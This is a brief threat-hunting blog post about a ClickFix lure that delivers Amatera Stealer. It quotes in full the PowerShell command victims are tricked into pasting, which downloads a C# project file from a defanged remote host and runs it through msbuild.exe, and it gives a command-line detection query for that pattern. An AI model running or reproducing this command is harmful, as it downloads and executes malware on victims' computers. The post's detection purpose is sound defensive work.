172. Another Curious ClickFix PowerShell Command

Hello everyone!

I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste.

Proofpoint has published a report on Amatera Stealer, and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog:

powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"

The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe.

So, as always, we can use suspicious command line arguments for detection, for example:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: (*msbuild* AND *csproj*)

See you tomorrow!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

324. Adversaries Use HideMouse to Hide Evidence of Remote Access